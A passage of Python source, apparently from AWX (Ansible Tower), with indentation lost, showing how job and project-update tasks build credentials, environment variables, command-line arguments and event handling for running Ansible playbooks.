if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
def check_handler(self, config):
"""
IsolatedManager callback triggered by the repeated checks of the isolated node
"""
job_env = build_safe_env(config['env'])
for k, v in self.safe_cred_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(config['command']), job_cwd=config['cwd'], job_env=job_env)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
isolated_manager_instance = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
isolated = self.instance.is_isolated()
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
resource_profiling_params = self.build_params_resource_profiling(self.instance, private_data_dir)
env = self.build_env(self.instance, private_data_dir, isolated, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
**resource_profiling_params,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times, isolated_manager_instance=isolated_manager_instance)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, isolated=isolated, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if not isolated:
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def should_use_resource_profiling(self, job):
"""
Return whether this task should use resource profiling
"""
return settings.AWX_RESOURCE_PROFILING_ENABLED
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
if job.is_isolated() is True:
pu_ig = pu_ig.controller
pu_en = settings.CLUSTER_HOST_ID
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
if isolated_manager_instance and not job.is_container_group_task:
isolated_manager_instance.cleanup()
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, isolated=isolated, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
